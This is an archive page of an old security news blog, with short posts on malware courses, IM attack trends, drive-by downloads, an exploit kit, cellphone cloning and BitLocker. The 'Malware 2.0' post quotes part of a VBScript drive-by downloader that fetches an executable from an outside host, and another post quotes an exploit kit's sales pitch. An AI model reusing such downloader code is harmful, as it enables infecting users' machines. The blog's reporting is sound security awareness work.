Of Spam & Men

To content | To menu | To search

Monday 28 January 2008

Studying Malware Analysis In College

F-secure is about to start a course called "Malware Analysis and Antivirus Technologies" at the Helsinki University of Technology. I really wish we had that kind of classes when I was attending college!

And since F-secure is full of cool people, they provide the slides from the courses that were already done!

On the menu:

  • General introduction of the course [slides]
  • Fighting Online Crime [slides]
  • Windows operating system: Antivirus perspective.
  • Legal aspects of reverse engineering. Reverse engineering I
  • Reverse engineering II
  • Reverse engineering tools hands on classes
  • Mobile malware.
  • Using debuggers to analyze malware
  • Emulators and disassemblers. Behavioral analysis of malware.
  • Reverse engineering III
  • Unpacking and decrypting malware
  • Antivirus engine design.

from F-secure

Thursday 16 August 2007

Web Server Software and Malware

From Google Online Security Blog:

"In this post we investigate the distribution of web server software to provide insight into how server software is correlated to servers hosting malware binaries or engaging in drive-by-downloads."

Their numbers are slightly different from Netcraft's ones, but they give a fairly good explanation about it. According to Google IIS and Apache are sharing the same percentage in the overall malware distributing web servers.

Interesting facts: in the US Malwares are served at 80% by Apache, in China at 95% by IIS...

From Google Online Security Blog

Tuesday 24 July 2007

iphone vulnerability video

A vulnerability was found in SafaryMobile allowing an intruder to get accès to your iphone filesystem. See the video:

Get the iphone's technical security analysis by securityevaluators.com: here

Monday 23 July 2007

Chat^WTroll with malware authors

castlecops.gifCastelcops.com is a popular site aiming at providing informations assisting computer security education. Their forums are particularly useful when you think something fishy's going on. A lot of very well informed people are participating.

Recently a conversation about rogue domains used by the (nasty) zlob malware was posted and the malware author came and tried to explain that his little creation wasn't a malware and that they weren't doing anything bad. No need to tell you the discussion literally went kaboom.

via The SpywareGuide Greynets Blog

facetime: IM & P2P attacks on the rise

header_logo_186_r.gifFacetime Security Labs, an IM Security focused research lab, recently reported that IM & P2P attacks were on the rise: a 5% inscrease of incidents targeting public IM and P2P channels for Q2 2007 compared to Q1 2007. Just to compare, over the same period in 2006 a 35% decrease was seen.

The SpywareGuide Greynets Blog summarizes:

From Q1 to Q2 2007, attacks spread via the mainstream networks (Yahoo, MSN and AOL) dropped from 74 total incidents in the first period to 64 in the second quarter. Attacks spread via AOL dropped by more than half > (from 28 incidents to 13). Overall, the MSN network accounted for 50 percent of the attacks on the major networks, followed by Yahoo at 30 percent and AOL with 20 percent.

As we predicted earlier this year, attacks spread via Internet Relay Chat (IRC) continue to account for a growing percentage of all attacks. In fact, the percentage of attacks that are IRC-based has risen in each of the last six quarters, rising from a 59 percent share in Q1 2006 to 72 percent in the current quarter.

via The SpywareGuide Greynets Blog

Monday 7 May 2007

harvesting using adblock

drivebydownload1.png

Or The Amish Virus through Adwords

Didier Stevens conducted a little experiment: What if he used adword and told people to visit his blog to get infected by a malware? His ad was saying “Is your PC virus-free? Get it infected here!” and it ran for 6 months. Of course clicking on the link would not infect the visitor's computer, but still, it could have. Guess how many people clicked? 409.

409 people wanted their computer infected? well, i guess people dont read. How many person use google to surf, thinking that adwords are actually results given by google?

Saturday 10 March 2007

Fun with cellphones

Ever heard of the Cellphone Cloning method? It's a way of transfering the identity of a phone to another, generally for the purpose of making fraudulent calls. It's fun because if you are located near the same transmission tower as the cellphone you cloned, you'll get copies of text messages and calls made to the original phone. You'll need to have access to the original cellphone and clone the sim, then upload the sim data into your phone. No easy thing.

What about being able to get any unencrypted transmission made around your cellphone directly on it?

Continue reading...

virus watch: warezov domains

Warezov, Spamthru... Virus used by spammers. They are pretty easy to detect if you can monitor http connections. Indeed more and more viruses will try to fetch data (spam templates or updates) from dedicaded domains. If you can monitor those domains, you can can detect infected computers on your networks.

Continue reading...

Monday 5 February 2007

Online System Security Scanners

Claus Valca posted a long list of online scanners:

  • Primarily virus/trojan related online scanners
  • Single-File Upload Scanners
  • Malware (spyware/adware/etc.) Online Scanners
  • Online "single-file" Multi-Scan Test Websites
  • Software or System Security Vulnerability Scanners
  • Not Quite "Fully-Online" Based Software or System Security Vulnerability Scanners

Continue reading...

Wednesday 3 January 2007

Research: IM Malware Attacks on the Rise

According to a new research report produced by security software maker Akonix Systems, in San Diego, experts at the company unearthed some 406 new IM-borne threats over the last 12 months, compared with 347 attacks tracked by the company in 2005.

In 2004 the company's security analysts discovered just under 50 attacks that were carried out either via IM or peer-to-peer technologies.

However, attacks delivered via P2P networks appear to be falling in popularity, as Akonix researchers recorded an 11 percent decrease in that type of threat during December 2006, with only 16 such attacks reported for the month. Akonix traditionally reports its research of IM and P2P threats simultaneously.

Continue reading...

Wednesday 13 December 2006

Hacker Infiltrates UCLA, Data on 800,000 People

eWeek reports:

An unknown hacker has infiltrated a massive University of California, Los Angeles database with personal information on 800,000 people, the school said on Tuesday, in one of the worst computer breaches ever at a U.S. university.

Continue reading...

Friday 1 December 2006

Malware against virtual keyboards

malware-virtualkeyboard1.jpg

More and More banking institutions are replacing the usual username/password form with a virtual keyboard. The sole purpose of thie method is to defeat keyloggers.

Unfortunately for them, more and more malwares also defeat the purpose of using virtual keyboards. The guys at VirusTotal analyze a new trojan that performs a series of small screen captures of the area aroundthe mouse cursor.It also adds a red arrow pointing exactly where the user clicked.

Continue reading...

Friday 24 November 2006

Malicious crypto: (Ab)use cryptology

This is a very interesting lecture from Frederic Raynal from the french security mag MISC:

Cryptology is everywhere nowadays. Most of the time, people don't even know they are actually using it on a daily basis. In this lecture, we'll show how the crytpography is actually a double edged sword. Despite cryptology's common use as a defensive way by providing primitives like confidentiality and integrity, we'll see to use cryptology for malicious purpose. We use it here to improve target selection during attacks, to save time or to be as sealth as possible.

Continue reading...

Thursday 23 November 2006

Vista's Bitlocker: More security for laptops

Vista's Entreprise and Ultimate editions will introduce a new (for Windows) security feature called BitLocker:

BitLocker Drive Encryption is a data protection feature available in Windows Vista Enterprise and Ultimate for client computers and in Windows Server "Longhorn". BitLocker is Microsoft’s response to one of our top customer requests: address the very real threats of data theft or exposure from lost, stolen or inappropriately decommissioned PC hardware with a tightly integrated solution in the Windows Operating System.

You can configure Vista to require an USB pen key or a flash drive to boot. If the user can't provide the right key, the data on the harddrive stays encrypted and (relatively) secure.

Continue reading...

Malware 2.0: Malware utilizes AJAX to install itself


Well, ok, it's not really AJAX. This malware uses an HTML bit using XMLHttpRequest to fetch and download the actual executable. Add some minor obfuscation to fool antiviruses and you get W32/new-malware!Maximus on your harddrive:

[title][/title]
[head][/head]
[body]
[script language=”VBScript”]
on error resume next

‘ due to how ajax works, the file MUST be within the same local domain
dl = “http://grupo-arroba.by.ru/grupo.exe”

‘ create adodbstream object
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,”")

Continue reading...

Sunday 19 November 2006

Web-Attacker Exposed

Websense analyzes Web-Attacker. Web-Attacker is the most popular toolkit for building malicious sites. It's supposedly used by one third of the malicious sites discovered:

Dear Friends! We would like to offer you multi-component exploit Web-Attacker, that realizes vulnerabilities in the interne browsers Internet Explorer and Mozilla Firefox. With the help of this exploit you will be able to install any programs on the local disks of visitors of your web pages. In the foundation of work of the exploit Web-Attacker, there are 7 already-known vulnerabilities in the internet browsers.

Objective of the Exploit: Hidden drop of the executable from the deleted source to the local hard drive of the site visitor.

It costs $300 and provides a few files to help you build your own malicious site. Just provide a malware, a keylogger or whatever you want to infect your visitors with.

Continue reading...

Saturday 18 November 2006

Malware Case Study

Secure Science Corporation and Michael Ligh did a very good job analyzing a malware. Their case study is a very complet and interesting analyze of a yet-to-be-named malware (prg.exe):

This document contains details of an exploratory case study that was conducted on a malware specimen found in the wild by members of the Mal-Aware Group 1 . The trojan was hosted on web servers located in the Ukraine and Russia, and existed among several gigabytes of data encoded with a proprietary algorithm. There were nearly 10,000 individual files available, each containing between 70 bytes and 56 megabytes worth of stolen data that only criminals could read…until now.

Continue reading...

Polish Police Own3d

Looks like one of the polish police's sites (http://www.elblag.policja.gov.pl) was defaced this week by a team nammed "un-root". un-root-logo Zone-h has a mirror of the defacement here

Continue reading...